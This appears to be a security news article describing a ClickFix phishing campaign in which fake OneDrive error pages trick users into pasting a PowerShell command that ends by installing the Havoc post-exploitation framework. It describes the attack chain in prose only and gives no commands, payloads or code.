HQ/EMEAFind out how we can help your business
A newly uncovered ClickFix phishing campaign is tricking victims into executing malicious PowerShell commands that could install the Havoc post-exploitation framework. This tactic could provide hackers with remote access to compromised machines.
ClickFix is a social engineering technique that initially appeared last year. In it, threat actors create webpages or phishing files that display fake issues and then push the user to click a button to resolve them.
Clicking the button copies a malicious PowerShell command to the Windows clipboard. Next, this action instructs users to paste it into a command prompt to “fix” the issue. However, as expected, the malicious PowerShell command instead runs a script from a remote site that downloads and installs malware on the devices.
The ClickFix phishing campaign exploits Microsoft’s cloud services.
In a new ClickFix phishing campaign, the threat actors send phishing emails claiming that a “restricted notice” is ready for inspection and that recipients should open the attached HTML document to access it.
Once accessed and viewed, the HTML displays a phoney 0x8004de86 error indicating that it seemingly failed to connect to the “One Drive” cloud service and that customers must manually update the DNS cache to resolve the error.
Once a user clicks the “How to fix” button, a PowerShell command is instantly copied to the Windows clipboard and instructions for executing it are displayed. This PowerShell command will attempt to run another PowerShell script on the threat actor’s SharePoint server.
The researchers also noted that the script determines whether the device is in a sandbox environment by checking the number of devices in the Windows domain. It will terminate if it discovers that it is running on a sandbox device.
On the other hand, the script will update the Windows Registry with a value indicating that the script was executed on the device. It will then check to see if Python is already installed on the device, and if not, it will be installed.
Finally, a Python script is downloaded from the same SharePoint site and run to embed the Havok post-exploitation command and control framework as an injected DLL.
Havoc, an open-source post-exploitation framework similar to Cobalt Strike, enables attackers to manipulate infected devices remotely.
Threat actors frequently employ post-exploitation frameworks such as Havoc to penetrate corporate networks and then propagate laterally to additional devices on the network. Therefore, users should always remember to never open a link from any messaging platform without verifying it to avoid and mitigate the effects of these phishing attacks.
